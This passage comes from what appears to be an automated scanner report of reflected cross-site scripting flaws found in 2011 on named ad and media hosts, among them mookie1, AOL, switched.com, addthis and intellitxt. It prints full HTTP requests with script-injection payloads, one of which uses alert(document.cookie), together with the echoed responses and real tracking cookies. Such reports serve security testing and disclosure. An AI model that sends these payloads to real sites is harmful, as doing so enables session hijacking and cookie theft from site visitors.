HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:43:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0abe"><script>alert(1)</script>8b2842306a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMa0abe"><script>alert(1)</script>8b2842306a2/11485203807@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:43:15 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61f91"><script>alert(1)</script>71d3e73a096 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/11485203807@x2361f91"><script>alert(1)</script>71d3e73a096?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:43:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52a9"><script>alert(1)</script>3157c2acd71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMc52a9"><script>alert(1)</script>3157c2acd71/2010DM/1628576703@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://www.parentdish.com/_uac/adpage.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:52:05 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f603e"><script>alert(1)</script>27d19133c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMf603e"><script>alert(1)</script>27d19133c5/1628576703@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://www.parentdish.com/_uac/adpage.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:52:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5cc"><script>alert(1)</script>f02ef969490 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1628576703@x239a5cc"><script>alert(1)</script>f02ef969490?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://www.parentdish.com/_uac/adpage.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:52:10 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62000"><script>alert(1)</script>f73671ebfb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM62000"><script>alert(1)</script>f73671ebfb0/2010DM/1671449763@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:43:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bedb1"><script>alert(1)</script>bd5553a3aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMbedb1"><script>alert(1)</script>bd5553a3aa/1671449763@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:43:15 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72819"><script>alert(1)</script>6bd426211c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1671449763@x2372819"><script>alert(1)</script>6bd426211c5?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:43:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 794ee"-alert(1)-"6f9e676b6eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /toolbar794ee"-alert(1)-"6f9e676b6eb HTTP/1.1 Host: downloads.channel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244900364.789990733.3152676352; path=/ Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:19:36 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 8537 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm30 --> <html xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]... <!-- s_265.mmxgo=false; s_265.pageName="Page Not Found"; s_265.channel="us.downloads"; s_265.trackExternalLinks="true"; s_265.prop1="toolbar794ee"-alert(1)-"6f9e676b6eb"; s_265.pfxID="brw"; s_265.disablepihost=false; s_265.prop12="http://downloads.channel.aol.com/toolbar794ee\"-alert(1)-\"6f9e676b6eb"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265 ...[SNIP]...
1.92. http://downloadsquad.switched.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://downloadsquad.switched.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62c89"><script>alert(1)</script>de3d7e413b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?62c89"><script>alert(1)</script>de3d7e413b9=1 HTTP/1.1 Host: downloadsquad.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://downloadsquad.switched.com/?62c89"><script>alert(1)</script>de3d7e413b9=1"/> ...[SNIP]...
1.93. http://downloadsquad.switched.com/2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60107"><script>alert(1)</script>f339a23027b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/?60107"><script>alert(1)</script>f339a23027b=1 HTTP/1.1 Host: downloadsquad.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://downloadsquad.switched.com/2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/?60107"><script>alert(1)</script>f339a23027b=1"/> ...[SNIP]...
1.94. http://downloadsquad.switched.com/2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ebd1"><script>alert(1)</script>f18dae81e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/?9ebd1"><script>alert(1)</script>f18dae81e83=1 HTTP/1.1 Host: downloadsquad.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://downloadsquad.switched.com/2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/?9ebd1"><script>alert(1)</script>f18dae81e83=1"/> ...[SNIP]...
1.95. http://downloadsquad.switched.com/2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 271c2"><script>alert(1)</script>4f9f1e70ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/?271c2"><script>alert(1)</script>4f9f1e70ef=1 HTTP/1.1 Host: downloadsquad.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 49eb5<script>alert(1)</script>c7ecb15712e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.politicsdaily.com/p.json?callback=_ate.ad.hpr49eb5<script>alert(1)</script>c7ecb15712e&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.politicsdaily.com%2F%3F12b75&ref=http%3A%2F%2Fburp%2Fshow%2F54&j0hyy0 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296924137.60|1296659685.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 287 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 06 Feb 2011 20:54:00 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 08 Mar 2011 20:54:00 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297025640.60|1296659685.66; Domain=.addthis.com; Expires=Tue, 05-Feb-2013 15:18:51 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sun, 06 Feb 2011 20:54:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:54:00 GMT Connection: close
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b6498%3balert(1)//8fbb8eb7701 was submitted in the jscallback parameter. This input was echoed as b6498;alert(1)//8fbb8eb7701 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /al.asp?ts=20110206203844&adid=0%2C126828&cc=us&di=29608951%2C29848200&hk=1&ipid=10231&mh=e096018077ddee628d1f0595aa706535&pid=2%2C2&pvm=21312d264a07f4ba843782fa6a49ed66&pvu=24D1B162B3D74248ACE40AC0B07FDF87&rcc=us&so=0&syid=0%2C0&uf=0%2C0&ur=0%2C0&kp=0%2C0%3B186%2C578%3B&prf=ll%3A670%7Cintl%3A889%7Cpreprochrome%3A3%7Cgetconchrome%3A58%7Ccontint%3A112%7Ccontl%3A1064%7Cadvint%3A118%7Cadvl%3A1183%7Ctl%3A1393&jscallback=$iTXT.js.callback4b6498%3balert(1)//8fbb8eb7701 HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6wEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACssBAAAAAwAAAS33y8OgAAABLffa/2wAAAEt99tmFQAAD6YBAAAAAgAAAS332v9sAAABLffbZhUAAAroAQAAAAEAAAEt98vDoAAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAhI/yng--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/javascript Content-Length: 65 Date: Sun, 06 Feb 2011 20:37:47 GMT Connection: close
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1da7"><script>alert(1)</script>24a46bbb395 was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2784%2C329%2C2776%2C4004%26type%3Dscript%26ipid%3D10231%26sfid%3D0e1da7"><script>alert(1)</script>24a46bbb395 HTTP/1.1 Host: electronista.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6wEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACssBAAAAAwAAAS33y8OgAAABLffa/2wAAAEt99tmFQAAD6YBAAAAAgAAAS332v9sAAABLffbZhUAAAroAQAAAAEAAAEt98vDoAAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAhI/yng--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 204 Date: Sun, 06 Feb 2011 20:37:40 GMT Connection: close
1.99. http://electronista.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://electronista.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e22c2'-alert(1)-'8d2186b5fd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
